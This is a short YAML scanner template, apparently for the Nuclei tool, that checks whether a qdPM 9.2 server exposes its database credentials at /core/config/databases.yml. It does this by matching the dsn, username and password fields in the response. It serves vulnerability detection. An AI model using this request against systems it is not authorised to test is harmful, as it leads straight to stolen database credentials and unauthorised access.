id: qdpm-info-leak

info:
  name: qdPM 9.2 - DB Credentials Exposure
  author: gy741
  severity: high
  description: qdPM 9.2 database credentials were discovered.
  reference:
    - https://www.exploit-db.com/exploits/50176
  metadata:
    max-request: 1
  tags: qdpm,exposure,edb

http:
  - method: GET
    path:
      - '{{BaseURL}}/core/config/databases.yml'

    headers:
      User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27      

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'dsn:'
          - 'username:'
          - 'password:'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100849a56ce64768d12b2326f94daae187f0a0ad982693443368d777328a311d43d02206198def38ee751bc2cea448d00282272afbe13f0a1d073c791c517be176d3ece:922c64590222798bb761d5b6d8e72950